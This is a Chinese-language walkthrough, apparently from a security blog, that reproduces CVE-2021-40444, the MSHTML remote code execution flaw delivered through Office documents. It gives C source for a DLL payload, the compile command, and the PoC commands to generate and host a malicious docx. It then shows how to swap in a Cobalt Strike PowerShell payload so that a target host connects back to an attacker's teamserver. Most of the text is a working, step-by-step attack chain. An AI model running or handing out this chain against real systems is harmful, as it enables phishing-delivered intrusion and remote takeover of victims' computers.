前言
微软MSHTML引擎存在代码执行漏洞,攻击者通过精心制作包含恶意ActiveX的Offcie文档,诱导用户打开,从而实现远程代码执行。当用户主机启用了ActiveX控件,攻击者可通过该漏洞控制受害者主机。
影响范围
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42
| WindowsServer,version20H2(ServerCoreInstallation) WindowsServer,version2004(ServerCoreinstallation) WindowsServer2022(ServerCoreinstallation) WindowsServer2022 WindowsServer2019(ServerCoreinstallation) WindowsServer2019 WindowsServer2016(ServerCoreinstallation) WindowsServer2016 WindowsServer2012R2(ServerCoreinstallation) WindowsServer2012R2 WindowsServer2012(ServerCoreinstallation) WindowsServer2012 WindowsServer2008forx64-basedSystemsServicePack2(ServerCoreinstallation) WindowsServer2008forx64-basedSystemsServicePack2 WindowsServer200832-bitSystemsServicePack2(ServerCoreinstallation) WindowsServer200832-bitSystemsServicePack2 WindowsServer2008R2forx64-basedSystemsServicePack1(ServerCoreinstallation) WindowsServer2008R2forx64-basedSystemsServicePack1 WindowsRT8.1 Windows8.1forx64-basedsystems Windows8.132-bitsystems Windows7forx64-basedSystemsServicePack1 Windows732-bitSystemsServicePack1 Windows10forx64-basedSystems Windows1032-bitSystems Windows10Version21H1forx64-basedSystems Windows10Version21H1forARM64-basedSystems Windows10Version21H132-bitSystems Windows10Version20H2forx64-basedSystems Windows10Version20H2forARM64-basedSystems Windows10Version20H232-bitSystems Windows10Version2004forx64-basedSystems Windows10Version2004forARM64-basedSystems Windows10Version200432-bitSystems Windows10Version1909forx64-basedSystems Windows10Version1909forARM64-basedSystems Windows10Version190932-bitSystems Windows10Version1809forx64-basedSystems Windows10Version1809forARM64-basedSystems Windows10Version180932-bitSystems Windows10Version1607forx64-basedSystems Windows10Version160732-bitSystems
|
漏洞复现
准备calc.c
文件
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26
| #include<windows.h>
void exec(void) { system("C:\\Windows\\System32\\calc.exe"); return; }
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) { switch(fdwReason) { case DLL_PROCESS_ATTACH: exec(); break; case DLL_THREAD_ATTACH: break; case DLL_THREAD_DETACH: break; case DLL_PROCESS_DETACH: break; } return TRUE; }
|
编译为dll文件
1 2
| sudo apt-get install gcc-mingw-w64 i686-w64-mingw32-gcc -shared calc.c -o calc.dll
|
下载POC
下载地址:https://github.com/lockedbyte/CVE-2021-40444
将dll文件放到test目录下替换掉原有文件
利用dll文件生成docx文档
1 2
| sudo python3 exploit.py generate test/calc.dll http://<SRVIP> # SRVIP为服务端IP
|
生成了out/document.docx、word.html和word.cab
开启web服务
1
| sudo python3 exploit.py host 80
|
把生成的document.docx上传到靶机,打开成功弹出计算器
漏洞利用
我们要目标弹出一个计算器有什么用呢?我们要想办法利用这个漏洞。
上线CS
在kali上启动一个CS
1
| sudo ./teamserver 192.168.45.129 123456
|
再打开客户端
设置一个监听
生成powershell command
修改calc.c
,把生成的payload替换,重命名为cs.c
把cs.c
编译为cs.dll
把生成的cs.dll
复制到test目录下,运行脚本生成word文档
开启web服务
1
| sudo python3 exploit.py host 80
|
把生成的文档上传到目标主机并打开,点击”启用编辑”
上线CS成功